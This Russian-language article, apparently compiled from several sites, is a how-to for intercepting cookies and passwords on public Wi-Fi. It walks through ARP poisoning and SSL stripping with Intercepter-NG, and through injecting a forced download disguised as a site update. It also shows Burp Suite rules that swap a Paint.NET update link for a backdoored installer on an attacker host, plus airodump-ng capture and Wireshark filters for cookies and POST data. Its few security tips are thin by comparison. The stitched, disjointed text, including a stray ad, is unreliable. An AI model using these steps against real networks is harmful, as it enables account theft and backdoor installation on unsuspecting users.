Кража куки через wifi mac os

А как же тогда работает перехват пакетов ?

Рассмотрим общий пример на Кали Линукс . Простым языком.

Ответ прост – хакер действительно может получать пакеты, предназначенные для вашего mac адреса, используя и своё сетевое устройство. Дело в том, что многие приёмные и передающие устройства (грубо говоря) могут работать в нескольких режимах. Опять же грубо говоря, можно выделить их три:

  • режим по умолчанию (пользователи windows 10 очень хорошо знакомы с ним, ибо в этом режиме система сама подключается ко всем видимым беспроводным сетям и сама создаёт незащищённую беспроводную сеть, которой могут пользоваться бесплатно все, кто оказался поблизости)
  • режим управления (беспроводная сеть защищена настройками, подключение нового устройства требует введения ключа). Но в принципе оба режима мало чем друг от друга отличаются, так что можно их объединить в один смело.
  • режим мониторинга (самый интересный для нас; в этом режиме могут работать далеко не все карты, однако изменяемые в программном режиме карты – встроенные и отдельно стоящие – позволяют “нюхать” передаваемые пакеты в пределах действия этих самых карт).

СПРАВОЧКА

Список модемов или встроенных карт можно проверить на сайте компании Tamosoft. Это наиболее полный и обновляемый список устройств, которые поддерживают перехват пакетов и будут работать в операционных системах windows и в кали линукс (здесь будьте внимательны, проверьте совместимость модемов и карт с Линукс-системами, чтобы после, уже после приобретения, не устраивать “танцы с бубном” – запустить модем в нужном режиме получится всё равно, но попотеть придётся). На него можно в принципе ориентироваться при планировании соответствующей покупки необходимого хакеру устройств. так что перепроверьте. Список представлен разработчиками программы CommView, которая имеет аналогичное применение, что и утилиты, описываемые ниже. Кроме одного – она и идущие вкупе с ней баснословно дороги. Идеальный вариант при выборе так называемых Альфа-карт конкретно под Кали Линукс будет представлен отдельной статьёй. И помните: способность перевести карту в режим мониторинга – это ещё не показатель того, что взлом пароля пройдёт успешно.

Перехват куки через wifi

Для того чтобы организовать перехват трафика wifi роутера посредством вай-фай, необходимо:

  1. Произвести поиск нужной беспроводной сети, характеризующейся наличием открытого шлюза доступа в интернет-пространство и большим количеством клиентов (торговый центр, кофейни, где пользователи пользуются услугами публичной сети для проверки почты, отправки деловых и личных сообщений);
  2. Изучить временной период наибольшего скопления людей;
  3. Иметь в наличии ноутбук, вайфай адаптер и специальные утилиты (желательно использовать операционную систему BackTrack3, поскольку в ней уже установлены необходимые для перехвата куков программы и ею можно пользоваться с внешнего носителя);
  4. Запустить настройку программы перехвата и поддержки режима
  5. Выбрать требуемую сеть;
  6. Переключить тип на вай-фай;
  7. Нажать на значок радара;
  8. Нажать на Смарт скан;
  9. Выбрать хостинг, подвергаемый атаке;
  10. Нажать на Add to nat;
  11. Перейти Nat;
  12. Поменять последнюю цифру в Stealth ip для сокрытия собственного адреса;
  13. Выделить SSl Strip и SSL Mitm;
  14. В разделе Settings выбрать Resurrection и снять пометку с Spoof IP/Mac.
  15. Ждать отправки сообщений атакуемым хостингом.

Http inject (подсунуть жертве файл).

Ммм, довольно сладкая опция.

Можно подсунуть жертве чтобы она скачала файл. Нам остаётся надеяться что жертва запустит файл. Для правдоподобности, можно проанализировав какие сайты посещает жертва, подсунуть что то вроде обновления.

К примеру если жертва на VK назовите файл vk.exe . возможно жертва запустит решив что это полезное что.

Приступим.

  • Configure HTTP injection.
  • В первой ячейке что нам необходимо подменить ( предпочтение .js) и во втором поле вылезет javascript.
  • в 3м введите 1
  • Создайте в блокноте файл, назовите его например alert.js (js расширение)  и введите в нём к примеру следующее — alert (‘Download the update %domain%.’) , можно вместо Download the update  ввести что то своё, на что выйдет фантазия.
  • Нажимаете add и открываете сделанный выше скрипт.
  • Ставьте галочку на «Inject forced download» и выбираете файл который хотите подсунуть жертве.
  • Жмете ок, переходите в Nat mode и активируете SSL Strip.
  • Добавьте в жертву в Nat и жмите Starting arp poison.
  • Остается ожидать пока жертва скачает файл.

Дополнение

Разрешил свою проблему с тем, что в Windows Wi-Fi адаптеры не переводятся в режим монитора. Помог от посетителя на англоязычной версии этой статьи:

Проблема была решена удалением лишних файлов wpcap.dll и Packet.dll в C:\WINDOWS\System32 и в C:\WINDOWS\SysWOW64, эти файлы оставил только в папках C:\Windows\SysWOW64\Npcap\ и C:\Windows\System32\Npcap\.

Один Wi-Fi адаптер теперь нормально переводится в режим монитора и захватывает любые фреймы. Правда, у меня не получается переключить канал — он работает только на 1м канале. При переключении пишет «Успех», но при проверке канала вновь оказывается, что работает на 1м канале.

Второй Wi-Fi адаптер после перевода в режим монитора вызывает синий экран смерти — проблема именно в драйвере адаптера (имя файла вызвавшего ошибку выводится на синем экране).

Можно копать дальше и разбираться с проблемами — как будет время, продолжу возиться. Но всё-таки в Linux всё намного проще и стабильнее.

3. Используем Burp Suite для заражение целевой машины бэкдором

Необязательно ставить именно бэкдор – можно выбрать любую программу.

Алгоритм следующий:

  • ищем запросы с компьютера жертвы, которые сгенерировали программы в поисках обновления;
  • модифицируем полученные ответы, вставляя вместо реальных ссылок на обновлённые программы наш файл с бэкдором.

Эта схема не самая лучшая, поскольку нам придётся долго ждать, пока выйдет обновление какой-нибудь программы, которая установлена на компьютере цели. И даже если мы этого дождёмся, мы можем не успеть среагировать. Поэтому чуть улучшим наш алгоритм:

  • ищем запросы с компьютера жертвы, которые сгенерировали программы в поисках обновления;
  • модифицируем запрос с компьютера жертвы, создавая иллюзию, что обновление запрашивает программа с более низкой версией ИЛИ модифицируем ответ сервера, повышая версию программы, доступную для установки;
  • модифицируем полученные ответы, вставляя вместо реальных ссылок с обновлениями программ наш файл с бэкдором.

На самом деле, имеются ещё варианты:

  • можно полностью модифицировать ответ сервера, предлагая обновления даже для актуальной версии программы;
  • используя DNS прокси можно вообще перенаправить запросы на свой сервер и на запросы об обновлениях отвечать что угодно и когда угодно.

Выбранная стратегия сильно зависит от конкретной программы. Поэтому перед реальной атакой проводите тесты и выбирайте наиболее подходящий вариант действий.

На компьютере жертвы установлена программа Paint.NET (определили по сайту запроса и по передаваемым данным). Вот пример проверки обновлений:

Запрос:

GET /updates/versions.8.1000.0.x64.ru.txt HTTP/1.1
Host: www.getpaint.net
Connection: close

Ответ:

HTTP/1.1 200 OK
Content-Length: 558
Content-Type: text/plain
ETag: "22e-528995bee3b40"
Server: Apache
Last-Modified: Tue, 05 Jan 2016 17:13:41 GMT
Connection: close
Date: Fri, 10 Jun 2016 05:12:34 GMT

DownloadPageUrl=http://www.getpaint.net/download.html

StableVersions=4.9.5848.30436
BetaVersions=

4.9.5848.30436_Name=paint.net 4.0.9
4.9.5848.30436_NetFxVersion=4.6
4.9.5848.30436_InfoUrl=http://blog.getpaint.net/2016/01/05/paint-net-4-0-9-is-now-available/
4.9.5848.30436_ZipUrlList=http://www.getpaint.net/updates/zip/paint.net.4.0.9.install.zip,http://www.dotpdn.com/files/paint.net.4.0.9.install.zip
4.9.5848.30436_FullZipUrlList=http://www.getpaint.net/updates/zip/paint.net.4.0.9.install.zip,http://www.dotpdn.com/files/paint.net.4.0.9.install.zip

На целевом компьютере это выглядит так:

Подготовить бэкдор на основе имеющегося исполнимого файла можно, например, с помощью программы Backdoor Factory (BDF). Вариантов достаточно много и этой теме можно посвятить отдельную статью, поэтому пока не будем останавливаться на теме подготовки пропатченных исполнимых файлов.

Обратим внимание на строку:

StableVersions=4.9.5848.30436

Это самая свежая версия на сервере. Эту строку программа сравнивает со своей версией и исходя из этого принимает решение – есть обновления или нет.

В Burp переходим в Proxy -> Options. Находим там Match and Replace. Нажимаем Add для добавления нового правила:

Request header меняем на Response body. В качестве строки для поиска вставляем 4.9.5848.30436, в качестве строки, на которую менять, вставляем, к примеру, 5.9.5848.30436:

Добавляем ещё одно правило. Нам нужно строку http://www.getpaint.net/updates/zip/paint.net.4.0.9.install.zip,http://www.dotpdn.com/files/paint.net.4.0.9.install.zip поменять на что-то наше – на ссылку установщика с бэкдором. Например, на http://192.168.1.35/paint.net.5.0.9.install.zip,http://192.168.1.35/paint.net.5.0.9.install.zip

Добавляем правило:

После очередной проверки обновлений, оригинальный ответ:

Ответ после нашей модификации:

На компьютере жертвы дела обстоят так:

Видно, что программа считает, что нужно обновиться, но мы забыли поменять ещё одну запись которая выводиться пользователю – хорошо, что мы всё тестируем заранее ))

Создадим ещё одно правило – нам не трудно:

Меняем строку

Name=paint.net 4.0.9

На

Name=paint.net 5.0.9

Теперь на целевой машине:

Просто для хохмы:

На целевой машине теперь:

Чтобы программа сама начала обновление и установку файла, нужно передать ей подобный файл (например, если оригинальные обновления упакованы в zip, то в таком же формате и нужно пересылать установщик с бэкдором, если программа использует протокол HTTP, то его и нужно использовать (а не HTTPS)).

Linux

Речь пойдет не только про Kali Linux, а вообще про скрипты для Unix систем как основных в тестировании на проникновение. Ниже перечислю основные интересные скрипты для работы. Жаждущие устроить перехват с актуальными данными используют именно эти утилитки. Все остальное – потеря времени.

  • mitmAP – создает точку доступа, устраивает понижение HTTPS и хватает все идущее через нее. Работает на ура, далеко не все сайты устоят. ВКонтактик опускает руки. Скрипт задает вам логичные вопросы по шагам. Ясно дело на басурманском языке, но и люди, знакомые с Линуксом, не абы кто. Так что легко разберетесь. Комментарии излишни. Собирает данные в текст и файлы для Wireshark (которым, к слову, тоже можно поанализировать все пакеты в сети).
  • WiFi-Pumpkin – еще одна точка доступа, но уже с графическим интерфейсом. Функционал покруче интерцептора. Тоже лежит на Гите.

За сим заканчиваю этот коротки обзор. Как видите – даже сейчас и даже при шифровании возможны утечки данных. Так что рекомендую быть бдительными в открытых сетях, а весь трафик пускать через свои VPN сервисы, дабы злоумышленники не могли нанести вам ущерб. Всем хорошего дня!

Здравствуйте.Недавно я писал статью о том, чем опасны открытые точки доступа Wifi, о том что могут перехватить пароли.

Сегодня рассмотрим перехват паролей по Wi Fi и перехват куки по Wi Fi при помощи программы Intercepter NG

                                                           перехват куки по Wi Fi

Атака будет происходить за счет сниффинга (Sniffing).

Sniffing — sniff переводится как «Нюхать». Сниффинг позволяет анализировать сетевую активность в сети, просматривать какие сайты посещает пользователь и перехватывать пароли. Но может быть использовано и в полезных целях, для прослушки вирусов, которые отправляют какие либо данные в интернет.</span></p>

Сервис ави1 предлагает умопомрачительно дешевые цены на возможность заказать подписчиков на свой профиль в Инстаграме. Добейтесь увеличения популярности в сети или продаж уже сейчас, не затрачивая массу усилий и времени.

Работа с программой Intercepter NG

Итак, программа запускается через Intercepter-NG.exe . Программа имеет английский интерфейс, но если вы уверенный пользователь компьютера думаю вы разберетесь.

Внизу будет видео по настройке (для тех кому удобнее смотреть чем читать).— Выбираете нужную сеть в верху если их у вас несколько.— Переключаете тип Ethernet/WiFi , если у вас Wi Fi то необходимо выбрать значок Wi FI (левее от выбора сети)

— Нажимаете кнопку Scan Mode (значок радара)— В пустом поле щелкаете правой кнопкой мышки и нажимаете в контекстном меню Smart scan— Покажутся все подключенные устройства к сети— Выбираете жертву (можно выделить всех с зажатой клавишей Shift), только не отмечайте сам роутер, его Ip обычно 192.168.1.1— Выделив нажимаем правой кнопкой мыши и нажимаем Add to nat

— Переходим во вкладку Nat— В Stealth ip желательно изменить последнюю цифру, на любую не занятую, это позволит скрыть ваш настоящий IP.— Ставим галочки на SSl Strip и SSL Mitm.

— Нажимаем Settings (шестеренки справа) .— Ставим галочку на Resurrection (Это позволит перехватывать пароли и куки шифрованного Https протокола) и Снимаем Spoof IP/Mac . Можно поставить галочку на Cookie Killer, благодаря ей, жертву выкинет из текущей странички например социальной сети и жертве придется ввести заново пароль, а мы уже его перехватим. Сравните настройки с картинкой.

— Здесь настройка завершена, закрываем настройки на галочку.— Настройка завершена, можно приступать к атаке.— Нажимаете вверху кнопку Start/stop sniffing (треугольник ), в том же окне нажимаем внизу значок радиации Start/Stop ARP Poison— Перейдите во вкладку Password mode и нажмите в окне правой кнопкой мыши и выберите Show Cookies («Это позволит показывать куки и пароли вводимые жертвами»)Всё, ждем когда кто нибудь введет пароль. Иногда случается что перестает работать интернет, попробуйте попробовать сами зайти в интернет, если не работает перезапустите программу.Заметил что не всегда получается перехватить пароль, но по сути срабатывает практически без отказа.

Вот собственно и всё, мы рассмотрели перехват паролей по Wi Fi и перехват куки по Wi Fi.

 Берегите себя

  • https://networkguru.ru/wireshark-perekhvat-paroley/
  • https://wifigid.ru/vzlom/perehvat-parolej-cherez-wi-fi
  • http://teralex.ru/nastrojka-i-rabota-s-programmami/perexvat-parolej-po-wi-fi-i-perexvat-kuki-po-wi-fi.html

Как убедиться, что Wifi безопасен

Использование протокола WPA2 создает более высокую защиту файлов от пользователей, решивших произвести перехват данных через wifi

Однако в целях предосторожности стоит время от времени проверять безопасность собственного вай-фай. Для этого необходимо воспользоваться пошаговой инструкцией:

  1. зайти в раздел по изменению настроек роутера;
  2. посмотреть на количество подключенных клиентов;
  3. сравнить известные подключения;
  4. обнаружить неизвестные и запретить им доступ.

Данный подход основан на том, что для каждого подключенного устройства отображается его реальный уникальный MAC- и IP-адрес.

Таким образом, в данной статье подробно рассказывается, как через общий вай фай перехватить данные, а также каким способом можно защитить устройства (iphone, андроид-технику, компьютеры). При наличии выбора типа сети лучше отдавать предпочтение домашним.

Использование публичной точки доступа чревато для клиентов потерей данных. В общем случае злоумышленнику для организации взлома нужно иметь при себе компьютерное устройство, адаптер вай-фай для режима мониторинга и пакет утилит aircrack-ng.

Перехват трафика в открытых Wi-Fi сетях

Для успешной атаке нужен компьютер на Linux (например, с Kali Linux или с BlackArch), а также Wi-Fi карта из этого списка.

Начнём с того, что посмотрим имена беспроводных интерфейсов:

iw dev

Как можно увидеть, у меня несколько беспроводных интерфейсов, я буду использовать wlp0s20f0u2.

Переводим беспроводной интерфейс в режим монитора:

sudo ip link set ИНТЕРФЕЙС down
sudo iw ИНТЕРФЕЙС set monitor control
sudo ip link set ИНТЕРФЕЙС up

В предыдущих командах вместо ИНТЕРФЕЙС нужно вписать то имя, которое беспроводной интерфейс имеет в вашей системе. Например, для wlp0s20f0u2 команды выглядят так:

sudo ip link set wlp0s20f0u2 down
sudo iw wlp0s20f0u2 set monitor control
sudo ip link set wlp0s20f0u2 up

Запускаем airodump-ng командой вида:

sudo airodump-ng ИНТЕРФЕЙС -t OPN

Где:

  • ИНТЕРФЕЙС — имя беспроводного интерфейса в вашей системе
  • -t OPN — фильтр, который показывает только открытые Wi-Fi сети

У меня интерфейс называется wlp0s20f0u2, поэтому я запускаю следующей командой:

sudo airodump-ng wlp0s20f0u2 -t OPN

Пример полученных данных:

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                             
 00:15:6D:9A:26:C0  -35       19      454    8   1   65  OPN              Anan Apartment     
 00:15:6D:9C:26:84  -45       29        1    0   6   65  OPN              Anan Apartment     
 00:27:22:02:C0:D0  -64       17        0    0   1   65  OPN              Anan Apartment     
 C8:3A:35:01:3F:90  -78        9        1    0  11  135  OPN              Tenda         

Как можно увидеть, имеется сразу несколько открытых Точек Доступа

В принципе, можно выбрать любую из них для перехвата данных, но нужно помнить, что: для успешного анализа данных важно захватить передаваемые данные и от ТД, и от Клиентов. То есть я могу выбрать для захвата данных дальнюю ТД и, вероятно, я буду захватывать большую часть её беспроводных фреймов, но дело в том, что у Клиентов обычно менее мощные беспроводные передатчики

Также Клиенты могут находиться ещё дальше от меня, чем сама Точка Доступа. По этой причине лучше выбирать самую близкую ТД. Чем больше значение PWR, тем лучше сигнал (на всякий случай напомню: отрицательные числа чем ближе к нулю, тем они больше). Например, в моей ситуации я выбираю ТД с сигналом -35.

Направленные антенны могут значительно улучшить качество беспроводного соединения, если направлены в нужную сторону. Что касается захвата данных, то лучше не использовать направленную антенну, поскольку ТД может быть в одном направлении, а её Клиенты — в других. Желательно использовать большую внешнюю антенну.

Неважно, является ли ТД хот-спотом с авторизацией на веб-интерфейсе (Captive Portal — Перехватывающим Порталом) или просто открытой Точкой Доступа — описанный способ перехвата работает одинаково для любого из этих вариантов.

Для захвата данных вновь запускаем airodump-ng, но уже командой вида:

sudo airodump-ng ИНТЕРФЕЙС --channel НОМЕР --write openap

Где:

  • ИНТЕРФЕЙС — имя беспроводного интерфейса,
  • —channel НОМЕР — номер канала, на котором находится целевая ТД
  • —write openap — опция для сохранения захваченных данных в файл. В данном случае название файла будет начинаться с openap (можно поменять на своё усмотрение)

Например, я хочу прослушивать ТД, которая работает на первом канале, для этого я хочу использовать беспроводной интерфейс wlp0s20f0u2 и сохранять перехваченную информацию в файл, имя которого начинается на openap, тогда моя команда следующая:

sudo airodump-ng wlp0s20f0u2 --channel 1 --write openap

Далее ждём, когда соберётся достаточно данных. Анализировать данные можно прямо в процессе захвата — без остановки airodump-ng.

Ограничения WinPcap и Wi-Fi трафик в Wireshark

Ограничения захвата WiFi пакетов в Windows зависят от Winpcap, а не от самого Wireshark. Wireshark, однако, включает в себя поддержку Airpcap, специального WiFi сетевого адаптера, драйверы которого поддерживают мониторинг сетевого трафика в режиме мониторинга в Windows, что называется перехватом трафика в WiFi сети в беспорядочном режиме. Однако этот тип карт устарел и не может перехватывать трафик в сетях с новейшими стандартами WiFi (802.11ac).

Acrylic Wi-Fi является инновационной альтернативой для захвата сетевого трафика Wi-Fi в режиме монитора из Windows, включая новейшие стандарты 802.11ac.

Acrylic Wi-Fi Sniffer

Acrylic WiFi Sniffer также позволяет захватывать пакеты WiFi в режиме монитора с помощью Wireshark из Windows (в последних версиях Wireshark 3.0.0 или выше) и с помощью других продуктов Acrylic WiFi, таких как Heatmaps или Professional. Поскольку он был разработан как экономичная и легко конфигурируемая альтернатива конкретному оборудованию типа AirPCAP, он может восстанавливать все данные, доступные на картах этого типа, включая значения SNR, а также быть совместим с последними стандартами 802.11ac со всеми полосами пропускания (20, 40, 80 и 160 МГц).

Если вы хотите узнать больше о режимах захвата или ознакомиться с функциями, предоставляемыми этими двумя альтернативами в продуктах Acrylic Wi-Fi, вы можете посетить статью «Режим монитора и родной режим захвата в Acrylic Wi-Fi«.

Описание Wireshark

Wireshark — это самый первостепенный во всём мире анализатор сетевых протоколов. Он позволяет вам видеть на микроскопическом уровне что происходит в вашей сети. Де-факто (и часто де-юре) он стал стандартом во многих индустриях и образовательных учреждениях.

Развитие Wireshark процветает благодаря вкладу сетевых экспертов по всему миру. Он является продолжением проекта, который начался в 1998.

Wireshark обладает большим набором возможностей, которые включают в том числе следующие:

  • Глубокая проверка сотен протоколов, которые постоянно добавляются
  • Есть как живой захват, так и оффлайн анализ
  • Стандартный трёхпанельный браузер пакетов
  • Мультиплатформенность: Запускается на Windows, Linux, OS X, Solaris, FreeBSD, NetBSD и многих других
  • Захватываемые сетевые данные можно просматривать через графический интерфейс или в консольном режиме через утилиту TShark
  • Самые мощные в индустрии фильтры отображения
  • Богатый анализ VoIP
  • Чтение/запись многих разных форматов файлов захвата: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer (сжатый и несжатый), Sniffer Pro, and NetXray, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek и многие другие
  • Захваченные сжатые gzip файлы могут быть разархивированы на лету
  • Живые данные могут быть прочитаны с Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI и других (зависят от вашей платформы)
  • Поддержка расшифровки многих протоколов, влкючая IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP и WPA/WPA2
  • Правила раскраски могут быть применены к списку пакетов для быстрого, интуитивного анализа
  • Вывод можно экспортировать в XML, PostScript, CSV или в обычный текст

Лицензия: GPLv2

Немного теории – школьники пройдут мимо

Ребят, про школьников написал не случайно, пусть позлятся немного. Большая часть неграмотных вопросов к нашему порталу возникает именно у них. И большую часть ответов можно спокойно прочитать здесь же. Ну да ладно, этот раздел немного не о том. Здесь ОЧЕНЬ КРАТКО рассмотрим теорию перехвата данных в Wi-Fi сетях – открытой передачи, файлов, куки, сессии, пароли и чего там вам еще в голову взбредет собирать.

Вот основные 2 момента:

  • Мы можем перехватывать данные только в подключенной сети. Реализуется атака MiTM («человек посередине»), когда мы получаем запросы от роутера, сохраняем себе и передаем обратно машине-жертве. И то же самое в обратном порядке. Можно, конечно, слушать пакеты сетей, к которым мы не подключены, но без ключа их шифрование нам ничего не принесет ценного. Поэтому сначала подключаемся, а уже потом слушаем.
  • Не все данные в сети к сайтам идут в открытом виде. Протокол HTTPS на сайте шифрует трафик в обе стороны. Т.е. в теории мы можем перехватить пароль, но по факту ничего из него не вытянем. На этот случай появляются в разное время способы подмены HTTPS с дальнейшим проксированием через себя. Т.е. обходить можно, но порой такие способы фиксят разработчики браузеров.

И теперь после этих принципов нам остается самое простое – найти нужную программу или набор утилит, которые справятся с этими простыми задачами. Утилит много, есть под разные версии операционных систем, с разными уровнями сложности – основные из них я и покажу в этой статье. Но профессионализм формируется в самостоятельном изучении, так что не будем кормить горе-хацкеров, придется немного потрудиться.

Где скачать Intercepter-NG

Официальным сайтом программы Intercepter-NG является sniff.su. Там же её можно скачать. Но некоторые браузеры помечают сайт как содержащий нежелательное ПО. Конечно, это не препятствует посещению сайта, но если вам не хочется нажимать несколько лишних кнопок, то ещё одни официальным сайтом, где можно скачать Intercepter-NG, является зеркало на Гитхабе: https://github.com/intercepter-ng/mirror. Там имеются все версии программы:

  • файл с расширением .apk – это версия для Android (требует root прав)
  • с буквами CE – консольная версия
  • Intercepter-NG.v*.zip – основная версия для Windows

Скаченная программа не нуждается в установке – достаточно распаковать архив.

Анализ трафика в открытых Wi-Fi сетях

В процессе работы airodump-ng будет создан файл с расширением .cap, например, openap-01.cap.

Для анализа данных можно использовать разные программы, я покажу анализ беспроводного трафика с Wireshark.

Откройте файл с захваченными данными в Wireshark.

Для выделения разных данных нам понадобятся фильтры Wireshark. Здесь я покажу пример использования только некоторых фильтров, рекомендуется изучить большую подборку полезных фильтров Wireshark здесь.

Для оценки качества захвата, можно начать с фильтров, которые выводят результаты анализа TCP протокола.

Например:

tcp.analysis.duplicate_ack_num == 1

Этот фильтр выводит информацию о фреймах с флагом ACK, которые являются дублями. Большое количество таких фреймов может говорить о проблемах связи между Клиентом и Точкой Доступа.

Фильтр показа фреймов для которых не захвачен предыдущий сегмент:

tcp.analysis.ack_lost_segment

Это нормально в начале захвата данных — поскольку информация перехватывается не с самого начала. Но если эта ошибка часто возникает в дальнейшем, значит вы находитесь слишком далеко от Точки Доступа или Клиентов и вы не захватывает часть данных, которые они передают.

Для показа фреймов, которые являются ретрансмиссией (отправляются повторно):

tcp.analysis.retransmission

Большое количество таких фреймов может говорить о том, что между Клиентом и ТД плохая связь и им часто приходится отправлять повторно одни и те же данные.

С помощью фильтра

arp

Можно увидеть ARP трафик — с его помощью удобно анализировать, сколько всего устройств в данный момент подключено к локальной сети, какие у них IP адреса и какие MAC адреса. Зная MAC адрес устройства можно узнать его производителя.

С помощью фильтра

dns

можно увидеть все отправленные DNS запросы.

Благодаря этим запросам можно узнать, какие сайты посещали пользователи (даже если эти сайты используют HTTPS!), а также к каким онлайн сервисам были сделаны запросы.

Например, на скриншоте можно увидеть адреса онлайн кинотеатра Netflix, Facebook, различных сервисов Google.

Для фильтрации HTTP трафика фильтр:

http

Здесь можно узнать множество интересной информации. Например, можно увидеть запросы к сервисам и передаваемые данные, в том числе API ключи, идентификаторы устройств и прочее:

Можно увидеть посещённые URL адреса со всеми передаваемыми параметрами:

Видны информация авторизации, используемой при отправке данных:

Видны загруженные и открытые в Интернете файлы:

Вы можете сохранить любой переданный файл. Для этого выделите мышкой пакет, который его содержит (1), затем в средней панели, которая содержит подробную информацию, пролистните в самый низ, чтобы найти поле с данными и кликните на него правой кнопкой мыши, чтобы вызвать контекстное меню (2), в контекстном меню выберите Export Selected Packet Bytes (3) — Экспортировать байты выбранного пакета:

Введите имя файла, выберите расположение и сохраните его.

Кто-то обновляет Windows:

Также видны установленные пользователю кукиз или переданные им кукиз:

С помощью фильтра

http.cookie

можно увидеть HTTP запросы, в которых передавались кукиз.

А с помощью фильтра

http.set_cookie

можно увидеть запросы, в которых сервер установил кукиз в браузер пользователя.

Соседи скачивают странные торренты:

Переданные методом POST данные также видны:

Для поиска любых переданных изображений:

http.content_type contains "image"

Для поиска определённых видов изображений:

http.content_type contains "gif"
http.content_type contains "jpeg"
http.content_type contains "png"

Для поиска файлов определённого типа:

http.content_type contains "text"
http.content_type contains "xml"
http.content_type contains "html"
http.content_type contains "json"
http.content_type contains "javascript"
http.content_type contains "x-www-form-urlencode"
http.content_type contains "compressed"
http.content_type contains "application"

Поиска в Wireshark запросов на получения файлов определённого типа. Например, для поиска переданных ZIP архивов:

http.request.uri contains "zip"

Вместо http.request.uri для большей точности можно использовать фильтры http.request.uri.path или http.request.uri.query, например, для поиска запросов на скачивание файлов JPG (ссылки на картинки):

http.request.uri.path contains "jpg"

Фильтр, который показывает только данные, переданные методом POST:

http.request.method == "POST"

Фильтр, который показывает только данные, переданные методом GET:

http.request.method == "GET"

Поиск запросов к определённому сайту (хосту):

http.host == "<URL>"

Поиск запросов к определённому сайту по части имени:

http.host contains "здесь.частичное.имя"

Справка по Wireshark

Использование: 

wireshark  ... [ 
Интерфейс захвата:
  -i <интерфейс>           имя или idx интерфейса (по умолчанию: первый не петлевой)
  -f <фильтр_захвата>      фильтр пакета в синтаксисе фильтров libpcap 
  -s <snaplen>             длина снимка пакета (по умолчанию: 65535)
  -p                       не захватывать в неразборчивом режиме
  -k                       начать захват немедленно (по умолчанию: ничего не делать)
  -S                       обновить отображение пакета при захвате новых пакетов
  -l                       включить автоматическую прокрутку при использовании -S
  -I                       захватывать в режиме монитора, если доступен
  -B <размер буфера>       размер буфера ядра (по умолчанию: 2MB)
  -y <канальный уровень>   тип канального уровня (по умолчанию: первый подходящий)
  -D                       напечатать список интерфейсов и выйти
  -L                       напечатать список типов канального уровня интерфейсов и выйти

Условия остановки захвата:
  -c <счётчик пакетов>     остановить после n пакетов (по умолчанию: бесконечность)
  -a <условие автостопа.> ...  duration:ЧИСЛО — остановиться после ЧИСЛА секунд
                           filesize:ЧИСЛО — остановить этот файл после ЧИСЛА KB
                              files:ЧИСЛО — остановить после ЧИСЛА файлов
Текущий захват:
  -b <ringbuffer opt.> ... duration:ЧИСЛО — переключиться на следующий файл после ЧИСЛА секунду
                           filesize:ЧИСЛО — переключиться на следующий файл после ЧИСЛА KB
                              files:ЧИСЛО — кольцевой буфер: заменить после ЧИСЛА файлов
Файл ввода:
  -r <infile>              установить файл из которого читать (без труб (|) или стандартного вывода (stdin)!)

Обработка:
  -R <фильтр_чтения>       пакетный фильтр в формате синтаксиса фильтров отображения Wireshark
  -n                       отключить все преобразования (по умолчанию: всё включено)
  -N <name resolve flags>  включить указанное преобразование(я) по имени: "mnNtCd"
  --disable-protocol <имя_протокола>
                           отключить рассечение имя_протокола
  --enable-heuristic <короткое_имя>
                           включить рассечение эвристического протокола
  --disable-heuristic <короткое_имя>
                           отключить рассечение эвристического протокола

Пользовательский интерфейс:
  -C <профиль конфигурации> запустить с особым профилем конфигурации
  -Y <фильтр отображения> запустить с заданным фильтром отображения
  -g <номер пакета>       перейти к указанному номеру пакета после "-r"
  -J <фильтр для прыжка>         перейти к первому пакету, соответствующему
                           фильтру (отображения)
  -j                       поиск в обратном направлении для совпадающего пакета после "-J"
  -m <шрифт>               установить имя шрифта для использования в большинстве текста
  -t a|ad|d|dd|e|r|u|ud    формат вывода времени во временной метки (по умолчанию: r: rel. к первому)
  -u s|hms                 формат вывода секунд (по умолчанию: s: секунды)
  -X <ключ>:<значение>     опции расширения, смотрите руководство для подробностей
  -z <статистика>          показать различную статистику, смотрите руководство для подробностей

Вывод:
  -w <outfile|->           установить файл вывода (или '-' для stdout (стандартного вывода))

Прочее:
  -h                       показать справку и выйти
  -v                       показать информацию о версии и выйти
  -P <ключ>:<путь>         persconf:путь — персональный конфигурационные файлы
                           persdata:путь — персональный файлы с данными
  -o <имя>:<величина> ...  переписать настройки или текущие установки
  -K <keytab>              файл keytab для использования в расшифровывании kerberos
  --display=DISPLAY        дисплей X для использования

Оцените статью
Рейтинг автора
5
Материал подготовил
Андрей Измаилов
Наш эксперт
Написано статей
116
Добавить комментарий